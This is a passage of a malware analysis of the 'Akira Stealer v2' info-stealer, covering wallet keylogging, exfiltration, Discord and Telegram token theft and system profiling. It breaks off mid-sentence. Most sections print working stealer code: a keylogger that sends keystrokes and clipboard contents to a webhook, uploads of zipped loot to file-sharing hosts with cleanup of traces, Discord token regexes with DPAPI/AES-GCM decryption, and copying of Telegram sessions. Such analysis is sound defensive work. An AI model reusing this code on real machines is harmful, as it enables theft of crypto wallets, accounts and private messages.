access.",[629,21548,21550],{"id":21549},"_785-live-wallet-keylogging","7.8.5 Live Wallet Keylogging",[353,21552,14147],{},[353,21554,21555],{},"Cryptocurrency wallets are prime targets for modern info-stealers. Akira includes a live keylogger tailored specifically to steal wallet credentials such as seed phrases, private keys, and passwords at the moment of entry. Unlike generic keyloggers, this one activates only when a known wallet window is detected, dramatically reducing noise and increasing efficiency.",[353,21557,21558],{},"The module monitors active window titles and compares them against a hardcoded list of popular wallet apps like MetaMask, Phantom, Atomic Wallet, and others. Once a matching window is in focus, it begins recording keystrokes via system-wide keyboard hooks. When the user presses Enter, the module immediately captures the current clipboard contents—knowing that users often copy secrets during wallet setup or login—and sends both the typed input and clipboard data to the attacker's webhook. This approach is extremely effective because it combines two attack vectors:",[367,21560,21561,21564],{},[370,21562,21563],{},"Context-aware keylogging, to capture sensitive wallet inputs only when relevant.",[370,21565,21566],{},"Clipboard hijacking, to extract copied recovery phrases or destination addresses before they’re pasted.",[353,21568,21569],{},"Together, these methods allow attackers to silently compromise wallets in real time, even without browser access or file exfiltration.",[3102,21571,21573],{"className":17754,"code":21572,"language":17756,"meta":402,"style":402},"import keyboard, pyperclip\n\nclass WalletKeylogger:\n    def __init__(self, wallet_titles):\n        self.buf = \"\"\n        keyboard.on_release(self.capture)\n        self.wallet_titles = wallet_titles\n\n    def capture(self, event):\n        title = pygetwindow.getActiveWindow().title\n        if any(w in title for w in self.wallet_titles):\n            if event.name == 'enter':\n                data = f\"Keys:{self.buf}\\nClip:{pyperclip.paste()}\"\n                send_to_webhook(data)\n                self.buf = \"\"\n            else:\n                self.buf += event.name\n",[3724,21574,21575,21580,21584,21589,21594,21599,21604,21609,21613,21618,21623,21628,21633,21638,21643,21648,21653],{"__ignoreMap":402},[7258,21576,21577],{"class":14951,"line":14952},[7258,21578,21579],{},"import keyboard, pyperclip\n",[7258,21581,21582],{"class":14951,"line":403},[7258,21583,17114],{"emptyLinePlaceholder":415},[7258,21585,21586],{"class":14951,"line":704},[7258,21587,21588],{},"class WalletKeylogger:\n",[7258,21590,21591],{"class":14951,"line":15337},[7258,21592,21593],{},"    def __init__(self, wallet_titles):\n",[7258,21595,21596],{"class":14951,"line":13492},[7258,21597,21598],{},"        self.buf = \"\"\n",[7258,21600,21601],{"class":14951,"line":15666},[7258,21602,21603],{},"        keyboard.on_release(self.capture)\n",[7258,21605,21606],{"class":14951,"line":13493},[7258,21607,21608],{},"        self.wallet_titles = wallet_titles\n",[7258,21610,21611],{"class":14951,"line":17117},[7258,21612,17114],{"emptyLinePlaceholder":415},[7258,21614,21615],{"class":14951,"line":17123},[7258,21616,21617],{},"    def capture(self, event):\n",[7258,21619,21620],{"class":14951,"line":17369},[7258,21621,21622],{},"        title = pygetwindow.getActiveWindow().title\n",[7258,21624,21625],{"class":14951,"line":18290},[7258,21626,21627],{},"        if any(w in title for w in self.wallet_titles):\n",[7258,21629,21630],{"class":14951,"line":18296},[7258,21631,21632],{},"            if event.name == 'enter':\n",[7258,21634,21635],{"class":14951,"line":18302},[7258,21636,21637],{},"                data = f\"Keys:{self.buf}\\nClip:{pyperclip.paste()}\"\n",[7258,21639,21640],{"class":14951,"line":18308},[7258,21641,21642],{},"                send_to_webhook(data)\n",[7258,21644,21645],{"class":14951,"line":18314},[7258,21646,21647],{},"                self.buf = \"\"\n",[7258,21649,21650],{"class":14951,"line":18320},[7258,21651,21652],{},"            else:\n",[7258,21654,21655],{"class":14951,"line":18326},[7258,21656,21657],{},"                self.buf += event.name\n",[367,21659,21660,21666],{},[370,21661,21662,21665],{},[433,21663,21664],{},"Trigger list",": Window titles including “MetaMask”, “Phantom”, “Atomic Wallet”, etc.",[370,21667,21668,21671],{},[433,21669,21670],{},"Clipboard",": Captures copied seeds or private keys.",[629,21673,21675],{"id":21674},"_786-packaging-exfiltration","7.8.6 Packaging & Exfiltration",[353,21677,14147],{},[353,21679,21680],{},"After collecting browser data, credentials, wallet information, and tokens, Akira proceeds to consolidate and exfiltrate the loot in a highly automated and stealthy manner. This stage marks the final step in the infection chain, and it’s optimized for reliability and minimal forensic footprint. First, all collected data—including browser dumps, logs, and keylogged wallet information—is compressed into a ZIP archive. This ensures the full dataset can be transferred as a single payload. The archive is then uploaded to multiple public file-sharing services such as GoFile, File.io, or Oshi.at, depending on availability. These platforms provide anonymous, temporary hosting, and are often used to bypass corporate firewalls or reputation-based blocking. A structured report is simultaneously generated and sent to the attacker via a Discord or Telegram webhook. It includes summary statistics—how many wallets were found, how many tokens were valid, and a direct link to the stolen data. This gives attackers a quick overview of the target’s value without opening the archive.",[353,21682,21683],{},"Finally, the malware deletes the temporary folder and the archive from disk, effectively removing local forensic evidence. By the time a defender discovers the infection, the data is already gone—and often irretrievable.",[3102,21685,21687],{"className":17754,"code":21686,"language":17756,"meta":402,"style":402},"# 1) ZIP everything (including Wallets folder)\nzip_path = shutil.make_archive(Utils.get_temp_folder(), 'zip', Utils.get_temp_folder())\n# 2) Attempt upload to primary & fallback services\nurl = Webhook.uploadToGofile(zip_path) or Webhook.uploadFileio(zip_path) or Webhook.uploadToOshiAt(zip_path)\n# 3) Report summary\nembed = {\n    \"title\": \"💰 Wallet & Token Exfiltration Report\",\n    \"fields\": [\n        {\"name\": \"Extension Wallets\", \"value\": data.ext_wallets_count},\n        {\"name\": \"Desktop Wallets\",   \"value\": data.desktop_wallets_count},\n        {\"name\": \"Discord Tokens\",    \"value\": len(valid_tokens)},\n        {\"name\": \"Telegram Sessions\", \"value\": data.has_telegram},\n        {\"name\": \"Archive Link\",      \"value\": url or \"[upload failed]\"},\n    ]\n}\nWebhook.sendDataTG(Utils.get_temp_folder(), chatId, startup)\n# 4) Cleanup local folder & ZIP\nUtils.clear_client_folder()\n",[3724,21688,21689,21694,21699,21704,21709,21714,21719,21724,21729,21734,21739,21744,21749,21754,21759,21763,21768,21773],{"__ignoreMap":402},[7258,21690,21691],{"class":14951,"line":14952},[7258,21692,21693],{},"# 1) ZIP everything (including Wallets folder)\n",[7258,21695,21696],{"class":14951,"line":403},[7258,21697,21698],{},"zip_path = shutil.make_archive(Utils.get_temp_folder(), 'zip', Utils.get_temp_folder())\n",[7258,21700,21701],{"class":14951,"line":704},[7258,21702,21703],{},"# 2) Attempt upload to primary & fallback services\n",[7258,21705,21706],{"class":14951,"line":15337},[7258,21707,21708],{},"url = Webhook.uploadToGofile(zip_path) or Webhook.uploadFileio(zip_path) or Webhook.uploadToOshiAt(zip_path)\n",[7258,21710,21711],{"class":14951,"line":13492},[7258,21712,21713],{},"# 3) Report summary\n",[7258,21715,21716],{"class":14951,"line":15666},[7258,21717,21718],{},"embed = {\n",[7258,21720,21721],{"class":14951,"line":13493},[7258,21722,21723],{},"    \"title\": \"💰 Wallet & Token Exfiltration Report\",\n",[7258,21725,21726],{"class":14951,"line":17117},[7258,21727,21728],{},"    \"fields\": [\n",[7258,21730,21731],{"class":14951,"line":17123},[7258,21732,21733],{},"        {\"name\": \"Extension Wallets\", \"value\": data.ext_wallets_count},\n",[7258,21735,21736],{"class":14951,"line":17369},[7258,21737,21738],{},"        {\"name\": \"Desktop Wallets\",   \"value\": data.desktop_wallets_count},\n",[7258,21740,21741],{"class":14951,"line":18290},[7258,21742,21743],{},"        {\"name\": \"Discord Tokens\",    \"value\": len(valid_tokens)},\n",[7258,21745,21746],{"class":14951,"line":18296},[7258,21747,21748],{},"        {\"name\": \"Telegram Sessions\", \"value\": data.has_telegram},\n",[7258,21750,21751],{"class":14951,"line":18302},[7258,21752,21753],{},"        {\"name\": \"Archive Link\",      \"value\": url or \"[upload failed]\"},\n",[7258,21755,21756],{"class":14951,"line":18308},[7258,21757,21758],{},"    ]\n",[7258,21760,21761],{"class":14951,"line":18314},[7258,21762,15669],{},[7258,21764,21765],{"class":14951,"line":18320},[7258,21766,21767],{},"Webhook.sendDataTG(Utils.get_temp_folder(), chatId, startup)\n",[7258,21769,21770],{"class":14951,"line":18326},[7258,21771,21772],{},"# 4) Cleanup local folder & ZIP\n",[7258,21774,21775],{"class":14951,"line":18332},[7258,21776,20959],{},[2548,21778,21780,21781,8133],{"id":21779},"_79-discord-and-telegram-token-theft-class-discord","7.9. Discord and Telegram Token Theft (Class: ",[3724,21782,14596],{},[353,21784,10713],{},[353,21786,21787,21788,21790],{},"Akira Stealer v2’s ",[433,21789,14596],{}," class executes a highly parallelized, multi-stage process to harvest both Discord authorization tokens and Telegram session data. Below, we dissect each component with precise code references and illustrative examples.",[629,21792,21794],{"id":21793},"_791-initialization-path-enumeration","7.9.1 Initialization & Path Enumeration",[353,21796,14147],{},[353,21798,21799],{},"Upon instantiation, the constructor builds two sets of target paths:",[3102,21801,21803],{"className":17754,"code":21802,"language":17756,"meta":402,"style":402},"# Discord client LevelDB directories\ndiscord_paths = [\n    [f\"{self.ROAMING}/Discord\", \"/Local Storage/leveldb\"],\n    [f\"{self.ROAMING}/Lightcord\", \"/Local Storage/leveldb\"],\n    ...\n]\n\n# Chromium-based browser LevelDB directories\nbrowserPaths = [\n    [f\"{self.ROAMING}/Opera Software/Opera GX Stable\", \"opera.exe\", \"/Local Storage/leveldb\", ...],\n    [f\"{self.LOCAL}/Google/Chrome/User Data\", \"chrome.exe\", \"/Default/Local Storage/leveldb\", ...],\n    ...\n]\n",[3724,21804,21805,21810,21815,21820,21825,21829,21833,21837,21842,21847,21852,21857,21861],{"__ignoreMap":402},[7258,21806,21807],{"class":14951,"line":14952},[7258,21808,21809],{},"# Discord client LevelDB directories\n",[7258,21811,21812],{"class":14951,"line":403},[7258,21813,21814],{},"discord_paths = [\n",[7258,21816,21817],{"class":14951,"line":704},[7258,21818,21819],{},"    [f\"{self.ROAMING}/Discord\", \"/Local Storage/leveldb\"],\n",[7258,21821,21822],{"class":14951,"line":15337},[7258,21823,21824],{},"    [f\"{self.ROAMING}/Lightcord\", \"/Local Storage/leveldb\"],\n",[7258,21826,21827],{"class":14951,"line":13492},[7258,21828,17104],{},[7258,21830,21831],{"class":14951,"line":15666},[7258,21832,21184],{},[7258,21834,21835],{"class":14951,"line":13493},[7258,21836,17114],{"emptyLinePlaceholder":415},[7258,21838,21839],{"class":14951,"line":17117},[7258,21840,21841],{},"# Chromium-based browser LevelDB directories\n",[7258,21843,21844],{"class":14951,"line":17123},[7258,21845,21846],{},"browserPaths = [\n",[7258,21848,21849],{"class":14951,"line":17369},[7258,21850,21851],{},"    [f\"{self.ROAMING}/Opera Software/Opera GX Stable\", \"opera.exe\", \"/Local Storage/leveldb\", ...],\n",[7258,21853,21854],{"class":14951,"line":18290},[7258,21855,21856],{},"    [f\"{self.LOCAL}/Google/Chrome/User Data\", \"chrome.exe\", \"/Default/Local Storage/leveldb\", ...],\n",[7258,21858,21859],{"class":14951,"line":18296},[7258,21860,17104],{},[7258,21862,21863],{"class":14951,"line":18302},[7258,21864,21184],{},[367,21866,21867,21876],{},[370,21868,21869,21872,21873,456],{},[433,21870,21871],{},"Discord Paths"," target official and unofficial Discord clients under ",[3724,21874,21875],{},"%APPDATA%",[370,21877,21878,21881],{},[433,21879,21880],{},"Browser Paths"," cover popular browsers’ user data folders, including subfolders for local storage and extensions.",[353,21883,21884],{},"Threads are spawned for each entry:",[3102,21886,21888],{"className":17754,"code":21887,"language":17756,"meta":402,"style":402},"for patt in browserPaths:\n    t = Thread(target=self.get_btoken, args=[patt[0], patt[2]])\n    t.start()\nfor patt in discord_paths:\n    t = Thread(target=self.get_discord, args=[patt[0], patt[1]])\n    t.start()\n",[3724,21889,21890,21895,21900,21905,21910,21915],{"__ignoreMap":402},[7258,21891,21892],{"class":14951,"line":14952},[7258,21893,21894],{},"for patt in browserPaths:\n",[7258,21896,21897],{"class":14951,"line":403},[7258,21898,21899],{},"    t = Thread(target=self.get_btoken, args=[patt[0], patt[2]])\n",[7258,21901,21902],{"class":14951,"line":704},[7258,21903,21904],{},"    t.start()\n",[7258,21906,21907],{"class":14951,"line":15337},[7258,21908,21909],{},"for patt in discord_paths:\n",[7258,21911,21912],{"class":14951,"line":13492},[7258,21913,21914],{},"    t = Thread(target=self.get_discord, args=[patt[0], patt[1]])\n",[7258,21916,21917],{"class":14951,"line":15666},[7258,21918,21904],{},[353,21920,21921],{},"This threading model maximizes I/O throughput, probing dozens of directories concurrently.",[629,21923,21925],{"id":21924},"_792-token-extraction-logic","7.9.2 Token Extraction Logic",[353,21927,14147],{},[353,21929,21930],{},[433,21931,21932],{},"Plaintext Token Scraping from Browsers",[353,21934,21935,21938,21939,13854,21942,21945],{},[3724,21936,21937],{},"get_btoken(path, arg)"," navigates to each LevelDB folder and inspects ",[3724,21940,21941],{},".log",[3724,21943,21944],{},".ldb"," files:",[3102,21947,21949],{"className":17754,"code":21948,"language":17756,"meta":402,"style":402},"for file in os.listdir(path + arg):\n    if file.endswith((\".log\", \".ldb\")):\n        for line in open(f\"{path}{arg}/{file}\", errors=\"ignore\"):\n            for regex in (r\"[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{25,110}\", r\"mfa\\.[\\w-]{80,95}\"):\n                tokens = re.findall(regex, line)\n                for token in tokens:\n                    self.tokens.append(token)\n                    self.cehckToken(token)\n",[3724,21950,21951,21956,21961,21966,21971,21976,21981,21986],{"__ignoreMap":402},[7258,21952,21953],{"class":14951,"line":14952},[7258,21954,21955],{},"for file in os.listdir(path + arg):\n",[7258,21957,21958],{"class":14951,"line":403},[7258,21959,21960],{},"    if file.endswith((\".log\", \".ldb\")):\n",[7258,21962,21963],{"class":14951,"line":704},[7258,21964,21965],{},"        for line in open(f\"{path}{arg}/{file}\", errors=\"ignore\"):\n",[7258,21967,21968],{"class":14951,"line":15337},[7258,21969,21970],{},"            for regex in (r\"[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{25,110}\", r\"mfa\\.[\\w-]{80,95}\"):\n",[7258,21972,21973],{"class":14951,"line":13492},[7258,21974,21975],{},"                tokens = re.findall(regex, line)\n",[7258,21977,21978],{"class":14951,"line":15666},[7258,21979,21980],{},"                for token in tokens:\n",[7258,21982,21983],{"class":14951,"line":13493},[7258,21984,21985],{},"                    self.tokens.append(token)\n",[7258,21987,21988],{"class":14951,"line":17117},[7258,21989,21990],{},"                    self.cehckToken(token)\n",[367,21992,21993,22002,22010],{},[370,21994,21995,22001],{},[433,21996,21997,21998],{},"Regex ",[3724,21999,22000],{},"[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{25,110}"," matches standard Discord tokens.",[370,22003,22004,22009],{},[433,22005,21997,22006],{},[3724,22007,22008],{},"mfa\\.[\\w-]{80,95}"," captures MFA tokens.",[370,22011,22012,22013,22016],{},"Deduplication is implicit: tokens stored in ",[3724,22014,22015],{},"self.tokens"," before validation.",[353,22018,22019],{},[433,22020,22021],{},"Encrypted Token Decryption in Discord Client",[353,22023,22024,22025,22027,22028,22030,22031,22034],{},"Discord’s client encrypts Local Storage entries under DPAPI, prefaced by ",[3724,22026,19761],{}," or ",[3724,22029,19765],{},". ",[3724,22032,22033],{},"get_discord(path, arg)"," handles this:",[3102,22036,22038],{"className":17754,"code":22037,"language":17756,"meta":402,"style":402},"# Read Local State to obtain encrypted master key\nwith open(path + \"/Local State\", 'r') as f:\n    local_state = json.load(f)\nencrypted_key = b64decode(local_state['os_crypt']['encrypted_key'])[5:]\nmaster_key = self.CryptUnprotectData(encrypted_key)\n\n# Iterate LevelDB files for Base64 payloads\nfor file in os.listdir(path + arg):\n    if file.endswith((\".log\", \".ldb\")):\n        for line in open(f\"{path}{arg}/{file}\"):\n            for token_part in re.findall(r\"dQw4w9WgXcQ:([A-Za-z0-9+/=]+)\", line):\n                ciphertext = b64decode(token_part)\n                token = self.decrypt_value(ciphertext, master_key)\n                self.tokens.append(token)\n                self.cehckToken(token)\n",[3724,22039,22040,22045,22050,22054,22059,22064,22068,22073,22077,22081,22086,22091,22096,22101,22106],{"__ignoreMap":402},[7258,22041,22042],{"class":14951,"line":14952},[7258,22043,22044],{},"# Read Local State to obtain encrypted master key\n",[7258,22046,22047],{"class":14951,"line":403},[7258,22048,22049],{},"with open(path + \"/Local State\", 'r') as f:\n",[7258,22051,22052],{"class":14951,"line":704},[7258,22053,20360],{},[7258,22055,22056],{"class":14951,"line":15337},[7258,22057,22058],{},"encrypted_key = b64decode(local_state['os_crypt']['encrypted_key'])[5:]\n",[7258,22060,22061],{"class":14951,"line":13492},[7258,22062,22063],{},"master_key = self.CryptUnprotectData(encrypted_key)\n",[7258,22065,22066],{"class":14951,"line":15666},[7258,22067,17114],{"emptyLinePlaceholder":415},[7258,22069,22070],{"class":14951,"line":13493},[7258,22071,22072],{},"# Iterate LevelDB files for Base64 payloads\n",[7258,22074,22075],{"class":14951,"line":17117},[7258,22076,21955],{},[7258,22078,22079],{"class":14951,"line":17123},[7258,22080,21960],{},[7258,22082,22083],{"class":14951,"line":17369},[7258,22084,22085],{},"        for line in open(f\"{path}{arg}/{file}\"):\n",[7258,22087,22088],{"class":14951,"line":18290},[7258,22089,22090],{},"            for token_part in re.findall(r\"dQw4w9WgXcQ:([A-Za-z0-9+/=]+)\", line):\n",[7258,22092,22093],{"class":14951,"line":18296},[7258,22094,22095],{},"                ciphertext = b64decode(token_part)\n",[7258,22097,22098],{"class":14951,"line":18302},[7258,22099,22100],{},"                token = self.decrypt_value(ciphertext, master_key)\n",[7258,22102,22103],{"class":14951,"line":18308},[7258,22104,22105],{},"                self.tokens.append(token)\n",[7258,22107,22108],{"class":14951,"line":18314},[7258,22109,22110],{},"                self.cehckToken(token)\n",[367,22112,22113,22122],{},[370,22114,22115,22118,22119,22121],{},[433,22116,22117],{},"Master Key Recovery",": Strips the 5-byte DPAPI header, then calls ",[3724,22120,20426],{}," (wrapping Windows DPAPI) to decrypt the AES-GCM key.",[370,22123,22124,22127,22128,22131,22132,22135,22136],{},[433,22125,22126],{},"Payload Parsing",": Tokens are prefixed with ",[3724,22129,22130],{},"dQw4w9WgXcQ:"," (an attacker-chosen marker). After Base64 decoding, ",[3724,22133,22134],{},"decrypt_value()"," splits IV and ciphertext:",[3102,22137,22139],{"className":17754,"code":22138,"language":17756,"meta":402,"style":402},"def decrypt\\_value(buff, master\\_key):\niv = buff\\[3:15]\npayload = buff\\[15:]\ncipher = AES.new(master\\_key, AES.MODE\\_GCM, iv)\nreturn cipher.decrypt(payload)\\[:-16].decode()\n",[3724,22140,22141,22146,22151,22156,22161],{"__ignoreMap":402},[7258,22142,22143],{"class":14951,"line":14952},[7258,22144,22145],{},"def decrypt\\_value(buff, master\\_key):\n",[7258,22147,22148],{"class":14951,"line":403},[7258,22149,22150],{},"iv = buff\\[3:15]\n",[7258,22152,22153],{"class":14951,"line":704},[7258,22154,22155],{},"payload = buff\\[15:]\n",[7258,22157,22158],{"class":14951,"line":15337},[7258,22159,22160],{},"cipher = AES.new(master\\_key, AES.MODE\\_GCM, iv)\n",[7258,22162,22163],{"class":14951,"line":13492},[7258,22164,22165],{},"return cipher.decrypt(payload)\\[:-16].decode()\n",[629,22167,22169],{"id":22168},"_793-token-validation-exfiltration","7.9.3 Token Validation & Exfiltration",[353,22171,14147],{},[353,22173,22174],{},"Each extracted token is validated via live API call:",[3102,22176,22179],{"className":22177,"code":22178,"language":3722},[3720],"headers = {\"Authorization\": token}\nresp = requests.get(\"https://discordapp.com/api/v9/users/@me\", headers=headers)\nif resp.status_code == 200:\n    self.cehckToken(token)\n",[3724,22180,22178],{"__ignoreMap":402},[367,22182,22183],{},[370,22184,22185,2454,22188,22191,22192,22195,22196],{},[433,22186,22187],{},"On success",[3724,22189,22190],{},"cehckToken()"," determines whether to send via Telegram (",[3724,22193,22194],{},"useTg=True",") or Discord webhook:",[3102,22197,22199],{"className":17754,"code":22198,"language":17756,"meta":402,"style":402},"if useTg:\nself.sendTokenTg(token)\nelse:\nself.send\\_embed(token)\n",[3724,22200,22201,22206,22211,22216],{"__ignoreMap":402},[7258,22202,22203],{"class":14951,"line":14952},[7258,22204,22205],{},"if useTg:\n",[7258,22207,22208],{"class":14951,"line":403},[7258,22209,22210],{},"self.sendTokenTg(token)\n",[7258,22212,22213],{"class":14951,"line":704},[7258,22214,22215],{},"else:\n",[7258,22217,22218],{"class":14951,"line":15337},[7258,22219,22220],{},"self.send\\_embed(token)\n",[367,22222,22223],{},[370,22224,22225,22230],{},[433,22226,22227],{},[3724,22228,22229],{},"send_embed"," crafts a rich Discord embed containing user metadata (username, discriminator, email, Nitro status, billing info) using fields from",[3102,22232,22235],{"className":22233,"code":22234,"language":3722},[3720],"user_json = requests.get(...).json()\nusername = user_json[\"username\"]\nid = user_json[\"id\"]\n# embed fields: token, email, phone, IP, flags, Nitro, billing\n",[3724,22236,22234],{"__ignoreMap":402},[367,22238,22239],{},[370,22240,22241,22246],{},[433,22242,22243],{},[3724,22244,22245],{},"sendTokenTg"," sends a plain-text summary over Telegram API.",[629,22248,22250],{"id":22249},"_794-telegram-session-harvesting","7.9.4 Telegram Session Harvesting",[353,22252,14147],{},[353,22254,22255],{},"Beyond Discord tokens, the stealer grabs Telegram Desktop sessions:",[3102,22257,22259],{"className":17754,"code":22258,"language":17756,"meta":402,"style":402},"@staticmethod\ndef steal_telegram():\n    src = f\"{os.getenv('APPDATA')}/Telegram Desktop/tdata\"\n    Utils.TaskKill(\"telegram.exe\")\n    shutil.copytree(src, os.path.join(Utils.get_temp_folder(), \"Telegram\"))\n",[3724,22260,22261,22265,22270,22275,22280],{"__ignoreMap":402},[7258,22262,22263],{"class":14951,"line":14952},[7258,22264,18242],{},[7258,22266,22267],{"class":14951,"line":403},[7258,22268,22269],{},"def steal_telegram():\n",[7258,22271,22272],{"class":14951,"line":704},[7258,22273,22274],{},"    src = f\"{os.getenv('APPDATA')}/Telegram Desktop/tdata\"\n",[7258,22276,22277],{"class":14951,"line":15337},[7258,22278,22279],{},"    Utils.TaskKill(\"telegram.exe\")\n",[7258,22281,22282],{"class":14951,"line":13492},[7258,22283,22284],{},"    shutil.copytree(src, os.path.join(Utils.get_temp_folder(), \"Telegram\"))\n",[367,22286,22287,22293,22302],{},[370,22288,22289,22292],{},[433,22290,22291],{},"Process Termination",": Ensures file locks are released.",[370,22294,22295,22298,22299,22301],{},[433,22296,22297],{},"Recursive Copy",": Steals ",[3724,22300,21535],{}," folder, including user sessions, contacts, and cached messages.",[370,22303,22304,22306,22307,22310],{},[433,22305,14612],{},": The stolen folder is zipped and uploaded via ",[3724,22308,22309],{},"sendFilesTG()",", with the download link embedded in a Telegram message.",[353,22312,22313,22314,22316],{},"Akira Stealer’s ",[3724,22315,14596],{}," module combines regex-based scraping, DPAPI-backed AES-GCM decryption, live API validation, and multi-protocol exfiltration (webhook + Telegram) to deliver a seamless account takeover capability across both Discord and Telegram platforms.",[2548,22318,22320],{"id":22319},"_710-system-profiling","7.10 System Profiling",[353,22322,10713],{},[353,22324,22325,22326,22329],{},"Akira Stealer v2 incorporates an extensive system profiling phase to gather host metadata, environment attributes, and network details. This information is collated in the ",[3724,22327,22328],{},"Data"," class and later packaged with exfiltrated credentials. Below, we break down the profiling logic with direct code references.",[629,22331,22333,22334,22336],{"id":22332},"_7101-data-class-initialization","7.10.1 ",[3724,22335,22328],{}," Class Initialization",[353,22338,14147],{},[353,22340,22341,22342,22344],{},"On startup, an instance of ",[3724,22343,22328],{}," is created:",[3102,22346,22348],{"className":17754,"code":22347,"language":17756,"meta":402,"style":402},"class Data:\n    def __init__(self):\n        self.username = os.getlogin()\n        self.computerName = os.getenv(\"computername\") or \"Unable to get computer name\"\n        self.system_info = f\"Computer Name: {self.computerName}\\n...\"\n        ...\n        self.ip = requests.get(url=\"https://api.ipify.org\").text\n        ipdata = json.loads(requests.post(url=f\"http://ip-api.com/json/{self.ip}\").text)\n        self.country = ipdata.get(\"country\")\n        self.countryCode = ipdata.get(\"countryCode\", \"\").lower()\n",[3724,22349,22350,22355,22360,22365,22370,22375,22380,22385,22390,22395],{"__ignoreMap":402},[7258,22351,22352],{"class":14951,"line":14952},[7258,22353,22354],{},"class Data:\n",[7258,22356,22357],{"class":14951,"line":403},[7258,22358,22359],{},"    def __init__(self):\n",[7258,22361,22362],{"class":14951,"line":704},[7258,22363,22364],{},"        self.username = os.getlogin()\n",[7258,22366,22367],{"class":14951,"line":15337},[7258,22368,22369],{},"        self.computerName = os.getenv(\"computername\") or \"Unable to get computer name\"\n",[7258,22371,22372],{"class":14951,"line":13492},[7258,22373,22374],{},"        self.system_info = f\"Computer Name: {self.computerName}\\n...\"\n",[7258,22376,22377],{"class":14951,"line":15666},[7258,22378,22379],{},"        ...\n",[7258,22381,22382],{"class":14951,"line":13493},[7258,22383,22384],{},"        self.ip = requests.get(url=\"https://api.ipify.org\").text\n",[7258,22386,22387],{"class":14951,"line":17117},[7258,22388,22389],{},"        ipdata = json.loads(requests.post(url=f\"http://ip-api.com/json/{self.ip}\").text)\n",[7258,22391,22392],{"class":14951,"line":17123},[7258,22393,22394],{},"        self.country = ipdata.get(\"country\")\n",[7258,22396,22397],{"class":14951,"line":17369},[7258,22398,22399],{},"        self.countryCode = ipdata.get(\"countryCode\", \"\").lower()\n",[367,22401,22402,22415],{},[370,22403,22404,22407,22408,13854,22411,22414],{},[433,22405,22406],{},"Username & Hostname:"," Retrieved via ",[3724,22409,22410],{},"os.getlogin()",[3724,22412,22413],{},"COMPUTERNAME"," environment variable.",[370,22416,22417,22420,22421,22424,22425,22427],{},[433,22418,22419],{},"IP Address:"," Fetched with ",[3724,22422,22423],{},"requests.get(\"https://api.ipify.org\")",", then geolocated via ",[3724,22426,18588],{}," for country and ISO code.",[629,22429,22431],{"id":22430},"_7102-os-and-hardware-enumeration","7.10.2 OS and Hardware Enumeration",[353,22433,14147],{},[353,22435,22436],{},"Using Windows Management Instrumentation (WMI) commands:",[3102,22438,22440],{"className":17754,"code":22439,"language":17756,"meta":402,"style":402},"# Operating System\nself.computerOS = subprocess.run('wmic os get Caption', shell=True, capture_output=True).stdout\n# Total Physical Memory\nself.totalMemory = subprocess.run('wmic computersystem get totalphysicalmemory', ...)\n# BIOS UUID\nself.uuid = subprocess.run('wmic csproduct get uuid', ...)\n# CPU Identifier\nself.cpu = subprocess.run(\"powershell Get-ItemPropertyValue -Path 'HKLM:System...\\Processor_Identifier'\", ...)\n# GPU Name\nself.gpu = subprocess.run('wmic path win32_VideoController get name', ...)\n# Windows Product Key\nself.productKey = subprocess.run(\"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\\\Microsoft\\\\Windows NT...SoftwareProtectionPlatform' -Name BackupProductKeyDefault\", ...)\n",[3724,22441,22442,22447,22452,22457,22462,22467,22472,22477,22482,22487,22492,22497],{"__ignoreMap":402},[7258,22443,22444],{"class":14951,"line":14952},[7258,22445,22446],{},"# Operating System\n",[7258,22448,22449],{"class":14951,"line":403},[7258,22450,22451],{},"self.computerOS = subprocess.run('wmic os get Caption', shell=True, capture_output=True).stdout\n",[7258,22453,22454],{"class":14951,"line":704},[7258,22455,22456],{},"# Total Physical Memory\n",[7258,22458,22459],{"class":14951,"line":15337},[7258,22460,22461],{},"self.totalMemory = subprocess.run('wmic computersystem get totalphysicalmemory', ...)\n",[7258,22463,22464],{"class":14951,"line":13492},[7258,22465,22466],{},"# BIOS UUID\n",[7258,22468,22469],{"class":14951,"line":15666},[7258,22470,22471],{},"self.uuid = subprocess.run('wmic csproduct get uuid', ...)\n",[7258,22473,22474],{"class":14951,"line":13493},[7258,22475,22476],{},"# CPU Identifier\n",[7258,22478,22479],{"class":14951,"line":17117},[7258,22480,22481],{},"self.cpu = subprocess.run(\"powershell Get-ItemPropertyValue -Path 'HKLM:System...\\Processor_Identifier'\", ...)\n",[7258,22483,22484],{"class":14951,"line":17123},[7258,22485,22486],{},"# GPU Name\n",[7258,22488,22489],{"class":14951,"line":17369},[7258,22490,22491],{},"self.gpu = subprocess.run('wmic path win32_VideoController get name', ...)\n",[7258,22493,22494],{"class":14951,"line":18290},[7258,22495,22496],{},"# Windows Product Key\n",[7258,22498,22499],{"class":14951,"line":18296},[7258,22500,22501],{},"self.productKey = subprocess.run(\"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\\\Microsoft\\\\Windows NT...SoftwareProtectionPlatform' -Name BackupProductKeyDefault\", ...)\n",[353,22503,22504,22505,22508],{},"Results are parsed to human-readable strings (",[3724,22506,22507],{},"strip()",", index operations) and concatenated into:",[3102,22510,22512],{"className":17754,"code":22511,"language":17756,"meta":402,"style":402},"self.system_info = (\n    f\"Computer Name: {self.computerName}\\n\"\n    f\"Total Memory: {self.totalMemory}\\n\"\n    f\"CPU: {self.cpu}\\n\"\n    f\"GPU: {self.gpu}\\n\"\n    f\"Product Key: {self.productKey}\"\n)\n",[3724,22513,22514,22519,22524,22529,22534,22539,22544],{"__ignoreMap":402},[7258,22515,22516],{"class":14951,"line":14952},[7258,22517,22518],{},"self.system_info = (\n",[7258,22520,22521],{"class":14951,"line":403},[7258,22522,22523],{},"    f\"Computer Name: {self.computerName}\\n\"\n",[7258,22525,22526],{"class":14951,"line":704},[7258,22527,22528],{},"    f\"Total Memory: {self.totalMemory}\\n\"\n",[7258,22530,22531],{"class":14951,"line":15337},[7258,22532,22533],{},"    f\"CPU: {self.cpu}\\n\"\n",[7258,22535,22536],{"class":14951,"line":13492},[7258,22537,22538],{},"    f\"GPU: {self.gpu}\\n\"\n",[7258,22540,22541],{"class":14951,"line":15666},[7258,22542,22543],{},"    f\"Product Key: {self.productKey}\"\n",[7258,22545,22546],{"class":14951,"line":13493},[7258,22547,18509],{},[629,22549,22551],{"id":22550},"_7103-vm-detection-anti-sandbox-checks","7.10.3 VM Detection & Anti-Sandbox Checks",[353,22553,14147],{},[353,22555,22556,22557,22559],{},"Before deep profiling, the malware invokes 